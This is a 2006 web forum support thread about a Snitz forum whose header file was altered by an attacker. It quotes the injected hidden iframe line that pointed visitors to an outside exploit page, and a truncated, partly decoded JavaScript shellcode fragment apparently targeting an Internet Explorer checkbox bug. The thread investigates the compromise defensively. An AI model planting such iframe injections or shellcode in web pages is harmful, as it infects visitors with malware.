| Author |
 Topic  |
|
|
paypaldev
Starting Member
10 Posts |
 Posted - 24 March 2006 : 10:17:08
|
Hey all,
Hoping to get some insight here...
I wento to my forum today at http://www.paypaldev.org and my browser closed. Not thinking anything of it (weird) I went back to the page, where upon my browser started throwing critical errors. I ctr-alt-del out of IE and find a program on my desktop named "ver_prada.exe" (0 google hits). It then looks like something is up. I log into the FTP site and see that the inc_header.asp file was updated today. I uploaded my copy and downloaded the one up there. Sure enough, it had a line:
<iframe src="http://elogiks.com/file.php" height="0" width="0"></iframe>
Obviously, that is not supposed to be there. It likes to an asian site. Not fun.
Anyway, I realize there are newer versions of the boards out that may fix the hole that created this, but I'd be more interested to hear what method was used (injection?) to edit/write to my inc_header file.
Thanks. Please feel free to contact me directly. admin...@...paypaldev...dot...org
we are running Snitz Forums 2000 Version 3.4.03. |
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
|
|
Podge
Support Moderator
Ireland
3775 Posts |
|
|
paypaldev
Starting Member
10 Posts |
Posted - 24 March 2006 : 18:19:23
|
| Yeah, I have to agree at this point. Just check the write permissions. Could not find an issue. Somehow, they got the file altered again just now. I changed it. Ugh. |
 |
|
|
paypaldev
Starting Member
10 Posts |
Posted - 24 March 2006 : 18:29:12
|
To follow up. It appears the site is taking advantage of the MS IE bug just announced yesterday having to do with radio/checkboxes:
http://www.prweb.com/releases/2006/3/prweb362972.htm
Accesing the URL with FF you get to the page with a checkbox on it and a source of (I assume it writes the file out to the desktop):
Code removed by Davio. |
|
|
|
Davio
Development Team Member
Jamaica
12217 Posts |
Posted - 24 March 2006 : 20:57:10
|
Try posting the code in a text file and a link to it here. The code stretches the page too wide and make the topic hard to read.
I opened the page in FF also, and it froze FF for a few minutes. Whatever calculations it was trying to do, took a whole lot out of my system. Pagefile size rose to 1 GB.
Not sure exactly what the javascript is doing though. But somehow this guy is getting on your server and editing the files.
Have you kept up with all the security patches for the forum? |
Support Snitz Forums
|
|
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
Posted - 24 March 2006 : 21:03:51
|
| If I understood correctly, the IE bug would not be usable to change a file in your server, unless someone using IE from your server visited a link prepared to use the exploit. Again, as I stated before, any Snitz hack wouldn't allow changing files at the server. You don't have a file upload mod installed in your forum, do you? |
Snitz 3.4 Readme | Like the support? Support Snitz too |
|
|
|
Davio
Development Team Member
Jamaica
12217 Posts |
Posted - 25 March 2006 : 15:25:02
|
I took a look at the javascript and tried to debug it to see what it is doing. The output of the javascript function reveals this:
" <input type=\"checkbox\" id=\"blah\">\n<SCRIPT language=\"javascript\">\nshellcode = unescape(\"%u4343%u4343%u54EB%u758B%u8B3C%u3574%u0378\"+\n \"%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33\"+\n \"%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03\"+\n \"%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD\"+\n \"%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5\"+\n \"%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A\"+\n \"%u2e55%u7865%u0065%uC033%u0364%u3040%u0C78\"+\n \"%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B\"+\n \"%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC\"+\n \"%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0\"+\n \"%uBF50%u1A"
I did a google search for "nshellcode" and only results returned back was proof of concept code for many buffer overflows and exploits in various programs.
The output javascript seems incomplete. Trying to unescape revealed more jargon:
CC\xEB\x8B<tx
\xF5\x8B\xF5\xC9A3
6\xBE(\xF2\b\xCB\x03
@\xEF\xDF\xE7\x8B$\xDD
\x8BK^\x03\x8B\xC5
ulo.l
Uee3d@x
\x8B\fp\xAD@\xEB\x8B
4@\x8B<\xBFN\xEC
\x84\xFF\x83\x04,<\xD0
P%u1A
But whatever it is, it's not something good. |
Support Snitz Forums
|
|
|
|
revdarkwing
Starting Member
Slovenia
7 Posts |
Posted - 09 April 2006 : 01:42:21
|
Greetings,
I am just learning how to install a forum on my website and noticed this thread and became concerned. Are attacks on a forum of this nature commonplace or is this a freak occurance? It's hard enough trying to figure out how to install this on my site and it would be a pity it turned out to be an invitation to malware or other problems. I want to do my own forum vs using one of those provider sites because I want to put as much of the forum into non-English as possible and I thought this would be the best way, if I could learn how to do it. Thanks |
|
|
|
Bassman
Junior Member
Netherlands
256 Posts |
|
| |
Topic |
|
Topic Locked
